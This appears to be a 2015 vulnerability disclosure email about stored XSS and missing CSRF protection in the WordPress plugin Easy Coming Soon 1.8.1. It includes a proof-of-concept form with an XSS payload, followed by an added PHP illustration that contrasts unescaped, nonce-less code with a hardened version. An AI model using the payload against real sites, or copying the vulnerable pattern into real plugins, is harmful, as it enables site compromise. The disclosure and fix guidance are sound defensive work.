Subject: Persistent Cross-Site Scripting (XSS) in Easy Coming Soon 1.8.1
Date: Mon, 24 Aug 2015 15:08:31 +0200

Hello,

Plugin: Easy Coming Soon 1.8.1 https://wordpress.org/plugins/easy-coming-soon/

1. Persistent Cross-Site Scripting (XSS)

Authenticated administrators can store HTML/JavaScript code in plugin configuration values (there is no CSRF protection, so the settings form can also be submitted cross-site on an administrator's behalf!).

Method: POST
URL: http://localhost/wp-admin/admin.php?page=coming_soon
Vulnerable parameters: background_color, title_color, title_font_format, etc.

Example PHP callstack:
easy-coming-soon/theme_options/pages/design_page_settings.php:74

Verification:
--
<form method="POST" action="http://localhost/wp-admin/admin.php?page=coming_soon">
<input type="text" name="commingsoon_lite_settings_save_2" value="1" />
<input type="text" name="background_color" value='"><img src=x onerror=alert(1) />' />
<input type="submit" />
</form>
--
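Added here as an illustration and not taken from the advisory or from the plugin's source: a PHP sketch of the settings-page pattern the advisory describes (value stored and echoed back without a nonce check or escaping) next to the hardened form WordPress core provides for it (capability check, nonce, allow-list sanitisation, escaped output). All function and option names prefixed ecs_demo_ are hypothetical.

```php
<?php
// Illustration only, not the plugin's code. Names prefixed ecs_demo_ are made up.

// --- Assumed shape of the bug class: the posted value is stored without a
// nonce check and echoed back into an attribute unescaped.
function ecs_demo_save_unsafe() {
    if ( isset( $_POST['background_color'] ) ) {
        update_option( 'ecs_demo_background_color', $_POST['background_color'] );
    }
}
function ecs_demo_render_unsafe() {
    $color = get_option( 'ecs_demo_background_color', '#ffffff' );
    // A stored value containing a closing quote breaks out of the attribute here.
    echo '<input type="text" name="background_color" value="' . $color . '" />';
}

// --- Hardened pattern: capability check, nonce check (stops the cross-site
// submission), allow-list sanitisation on save, and escaping on output.
function ecs_demo_save_safe() {
    if ( ! isset( $_POST['ecs_demo_save'] ) ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // Dies unless a valid nonce for this action accompanies the request.
    check_admin_referer( 'ecs_demo_save_settings', 'ecs_demo_nonce' );

    $raw = wp_unslash( $_POST['background_color'] ?? '' );
    // sanitize_hex_color() accepts only "#abc" / "#aabbcc" forms; anything
    // else (including markup) is rejected and replaced by the default.
    $color = sanitize_hex_color( $raw );
    if ( empty( $color ) ) {
        $color = '#ffffff';
    }
    update_option( 'ecs_demo_background_color', $color );
}
function ecs_demo_render_safe() {
    $color = get_option( 'ecs_demo_background_color', '#ffffff' );
    echo '<form method="post">';
    wp_nonce_field( 'ecs_demo_save_settings', 'ecs_demo_nonce' );
    // esc_attr() neutralises quotes and angle brackets even if a bad value
    // ever reached the database (defence in depth).
    echo '<input type="text" name="background_color" value="' . esc_attr( $color ) . '" />';
    echo '<input type="submit" name="ecs_demo_save" value="Save" />';
    echo '</form>';
}
```

Hooking ecs_demo_save_safe() into admin_init and rendering with ecs_demo_render_safe() is all a plugin needs to close both the stored XSS and the CSRF vector described above.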

--
Regards,
Marcin Probola,